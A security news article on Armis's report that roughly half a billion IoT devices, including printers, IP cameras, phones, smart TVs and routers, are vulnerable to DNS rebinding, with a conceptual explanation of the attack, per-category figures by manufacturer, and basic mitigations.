Previously this year, it came to light that Google Home, Roku, Sonos, Chromecast, smart home Radio Thermostat CT50 & CT80 and all Blizzard games were vulnerable to DNS rebinding attacks. Now IoT security vendor Armis has warned that nearly half a billion “smart” devices are vulnerable to the decade-old DNS rebinding attack vector.
The vulnerabilities are “everywhere.” Due to the wide variety of about 496 million vulnerable devices – printers, smart TVs, streaming media players and speakers, IP cameras, IP phones, switches, routers and access points – Armis warned that “nearly all enterprises are susceptible” to DNS rebinding attacks which give remote attackers a way to get around firewalls and gain access to vulnerable devices on a local network – devices which were never meant to be accessed by the public.
Armis, which sounded the alarm about the BlueBorne attack vector last year, explained that DNS rebinding attacks allow remote attackers “to bypass a victim’s network firewall and use their web browser as a proxy to communicate directly with vulnerable devices on the local network.” After an attacker creates a DNS server for a malicious domain and a victim is tricked into surfing to the site, or is exposed to a malicious ad banner on a legitimate site, the attacker can use the victim’s browser as a proxy to connect to internal network devices.
According to Armis, most manufacturers of IoT devices commonly-used in enterprise ship devices which are vulnerable to the DNS rebinding attacks which were first discovered eleven years ago. The vulnerable devices put enterprises “at risk for attacks, data exfiltration, and take-over for a Mirai-like attack.”
165 million printers, or 66 percent, are vulnerable to DNS rebinding attacks. Armis named Hewlett Packard, Epson, Konica, Lexmark and Xerox as examples of representative manufacturers shipping vulnerable printers.
160 million, or 75 percent, of IP cameras by manufacturers such as Axis Communications, GoPro, Sony and Vivotek are vulnerable.
The firm identified that 124 million, or 77 percent, of IP phones are vulnerable; manufacturers include Avaya, Cisco, Dell, NEC and Polycom.
28.1 million, or 57 percent, of smart TVs – Roku-integrated, Samsung and Vizio – are vulnerable.
14 million, or 87 percent, of switches, routers and access points are vulnerable; manufacturers include Cisco, Netgear, Extreme, Aruba and Avaya.
5.1 million, or 78 percent, of streaming media players and smart speakers by Apple, Google, Roku and Sonos are vulnerable.
Armis explained, “An example of a vulnerable device is one that is running an unauthenticated protocol like Universal Plug and Play (UPnP) or HTTP (used on unencrypted web servers). These protocols are commonly used to host administrative consoles (for routers, printers, IP cameras) or to allow easy access to the device’s services (for example, streaming video players), and are pervasive in businesses.”
One mitigation approach is to disable services such as UPnP which are not needed, change device passwords and keep firmware updated. If you have hundreds of devices, that could be a time-consuming nightmare. The fastest suggested approach was to monitor the devices for signs of breach; Armis has such a monitoring platform.